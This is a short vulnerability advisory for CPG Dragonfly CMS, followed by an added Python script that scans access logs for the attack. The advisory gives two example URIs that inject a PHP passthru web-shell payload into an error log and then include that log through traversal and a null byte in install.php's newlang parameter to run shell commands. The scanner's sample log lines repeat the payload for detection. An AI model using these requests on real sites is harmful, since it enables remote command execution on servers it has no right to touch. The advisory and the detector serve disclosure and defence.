CPG Dragonfly CMS Remote Command Execution Vulnerability

An exploit is not required.

Example URIs have been provided:
http://www.example.com/[path]/error.php?<?passthru($_GET[cmd]);?>
http://www.example.com/[path]/install.php?cmd=ls%20-la&newlang=../../cpg_error.log%00

An exploit designed to leverage this issue was provided by rgod.
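
A log-review check for the two request shapes in the example URIs above, added here as an illustration and not part of the original advisory: it flags a PHP open tag in a query string and a newlang parameter carrying "../" sequences or a null byte. The log lines, client addresses, the /cms/ path and the function names are constructed for the example.

```python
import re
from urllib.parse import unquote

# Constructed access-log lines (common log format); addresses and /cms/ path are made up.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2010:10:00:00 +0000] "GET /cms/error.php?<?passthru($_GET[cmd]);?> HTTP/1.1" 404 512',
    '192.0.2.10 - - [01/Jan/2010:10:00:05 +0000] "GET /cms/install.php?cmd=ls%20-la&newlang=../../cpg_error.log%00 HTTP/1.1" 200 2048',
    '198.51.100.7 - - [01/Jan/2010:10:01:00 +0000] "GET /cms/install.php?newlang=english HTTP/1.1" 200 1024',
    '198.51.100.7 - - [01/Jan/2010:10:02:00 +0000] "GET /cms/index.php?name=News HTTP/1.1" 200 4096',
]

# Pull the request target out of the quoted request line.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def classify(line):
    """Return the indicator names matched by one access-log line."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    _path, _, query = m.group(1).partition("?")
    hits = []
    # Shape of the first example URI: a PHP open tag in the query string
    # (decoded first, so %3C%3F is caught as well as a raw "<?").
    if "<?" in unquote(query):
        hits.append("php-tag-in-query")
    # Shape of the second example URI: newlang with ../ and a trailing %00.
    for pair in query.split("&"):
        name, _, value = pair.partition("=")
        if unquote(name) != "newlang":
            continue
        value = unquote(value)
        if ".." in value:
            hits.append("newlang-traversal")
        if "\x00" in value:
            hits.append("newlang-null-byte")
    return hits


def scan(lines):
    """Map 1-based line numbers to their indicators, skipping clean lines."""
    findings = {}
    for lineno, line in enumerate(lines, start=1):
        hits = classify(line)
        if hits:
            findings[lineno] = hits
    return findings
```
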


 

Copyright 2010, SecurityFocus